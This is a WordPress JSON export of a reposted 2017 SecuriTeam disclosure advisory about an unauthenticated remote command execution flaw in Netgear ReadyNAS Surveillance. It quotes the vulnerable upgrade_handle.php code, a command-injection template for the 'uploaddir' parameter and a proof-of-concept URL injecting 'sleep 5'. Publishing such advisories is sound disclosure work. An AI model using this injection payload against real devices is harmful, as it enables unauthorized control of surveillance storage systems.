{"id":9564,"date":"2017-09-27T14:19:18","date_gmt":"2017-09-27T22:19:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/27\/news-3337\/"},"modified":"2017-09-27T14:19:18","modified_gmt":"2017-09-27T22:19:18","slug":"news-3337","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/09\/27\/news-3337\/","title":{"rendered":"SSD Advisory \u2013 Netgear ReadyNAS Surveillance Unauthenticated Remote Command Execution"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 27 Sep 2017 11:19:30 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<p><strong>Want to get paid for a vulnerability similar to this one?<\/strong><br \/>Contact us at: <a href=\"mailto:sxsxd@bxexyxoxnxdxsxexcxuxrxixtxy.com\" onmouseover=\"this.href=this.href.replace(\/x\/g,'');\" id=\"a-href-3409\">sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom<\/a><\/p>\n<p><script>var obj = jQuery('#a-href-3409');if(obj[0]) { obj[0].innerText = obj[0].innerText.replace(\/x\/g, ''); }<\/script>  \t\t<\/p>\n<div class=\"pf-content\">\n<p><strong>Vulnerability summary<\/strong><br \/> The following advisory describes an Unauthenticated Remote Command Execution vulnerability found in Netgear ReadyNAS Surveillance.<\/p>\n<p>Netgear ReadyNAS Surveillance &#8211; Small businesses and corporate branch offices require a secure way to protect physical assets, but often lack the security expertise or big budget that most solutions require. With these challenges in mind, NETGEAR introduces ReadyNAS Surveillance, easy-to-use network video recording (NVR) software that installs directly to a ReadyNAS storage device. Add a set of cameras to a Power over Ethernet ProSafe switch and your surveillance network is up and running in no time.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Kacper Szurek, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program<\/p>\n<p><strong>Vendor response<\/strong><br \/> Netgear was informed of the vulnerability on June 27, but while acknowledging the receipt of the vulnerability information, refused to respond to the technical claims, to give a fix timeline or coordinate an advisory.<\/p>\n<p><span id=\"more-3409\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> User controlled input is not sufficiently sanitized when passed to <em>upgrade_handle.php<\/em>.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59cc23e6359aa242891622\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<p><span class=\"crayon-language\">PHP<\/span><\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> else if( 0 == strcmp($_GET[&#8216;cmd&#8217;],&#8217;writeuploaddir&#8217;) )  {    if(constant(&#8220;NEED_UPLOAD_FROM_DISK&#8221;))   {    if (isset($_GET[&#8216;uploaddir&#8217;]))    {     $uploaddir = $_GET[&#8216;uploaddir&#8217;];     $fp = fopen(UPLOAD_CONF_PATH, &#8216;w&#8217;);     $strData = &#8220;server.upload-dirs=(&#8220;&#8221; . $uploaddir . &#8220;&#8221;)n&#8221;;       fwrite($fp, $strData);     fclose($fp);       $current_dir = system(&#8216;cat &#8216;.PHP_CINF_PATH.&#8217;| grep &#8216;upload_tmp_dir&#8221;);     $tmp_upload_dir = &#8216;upload_tmp_dir=&#8217;.$uploaddir;     $cmd = &#8220;sed -i &#8216;s\/&#8221;.str_replace(&#8216;\/&#8217;, &#8216;\/&#8217;, $current_dir).&#8221;\/&#8221;.str_replace(&#8216;\/&#8217;, &#8216;\/&#8217;, $tmp_upload_dir).&#8221;\/g&#8217; &#8220;.PHP_CINF_PATH;       system($cmd);     \/\/system(&#8220;echo &#8220;$uploaddir&#8221; &gt; &#8220;.UPGRADE_DIR_PATH);     $file = fopen(UPGRADE_DIR_PATH,&#8221;w&#8221;);     if( $file )     {      fwrite($file,&#8221;[UPLOAD]n&#8221;);      fwrite($file,&#8221;upload_dir=&#8221;&#8221;. $uploaddir .&#8221;&#8221;n&#8221;);      fclose($file);     }    }   }     header(&#8220;Content-type: application\/xmlrnrn&#8221;);   echo &#8220;Modify upload directory ok&#8221;;  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0045 seconds] -->  <\/p>\n<p>As we can see, <code><em>$_GET['uploaddir']<\/em><\/code> is not escaped and passed to <code><em>system()<\/em><\/code> through <code><em>$tmp_upload_dir<\/em><\/code><\/p>\n<p>By sending the following parameters<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59cc23e6359b4232325876\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> &#8216;?cmd=writeuploaddir&amp;amp;uploaddir=%27;COMMAND_TO_EXECUTE;%27&#8217;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59cc23e6359b4232325876-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59cc23e6359b4232325876-1\"><span class=\"crayon-s\">&#8216;?cmd=writeuploaddir&amp;amp;uploaddir=%27;COMMAND_TO_EXECUTE;%27&#8217;<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0003 seconds] -->  <\/p>\n<p>The input will be execute.<\/p>\n<p><strong>Proof of Concept<\/strong><\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59cc23e6359b7997700996\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> http:\/\/IP\/upgrade_handle.php?cmd=writeuploaddir&amp;uploaddir=%27;sleep%205;%27<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-59cc23e6359b7997700996-1\">1<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59cc23e6359b7997700996-1\"><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/IP\/upgrade_handle.php?cmd=writeuploaddir&amp;uploaddir=%27;sleep%205;%27<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3409\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Wed, 27 Sep 2017 11:19:30 +0000<\/strong><\/p>\n<p>Vulnerability summary The following advisory describes an Unauthenticated Remote Command Execution vulnerability found in Netgear ReadyNAS Surveillance. Netgear ReadyNAS Surveillance &#8211; Small businesses and corporate branch offices require a secure way to protect physical assets, but often lack the security expertise or big budget that most solutions require. With these challenges in mind, NETGEAR introduces &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3409\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Netgear ReadyNAS Surveillance Unauthenticated Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757,12136],"class_list":["post-9564","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9564","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=9564"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/9564\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=9564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=9564"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=9564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}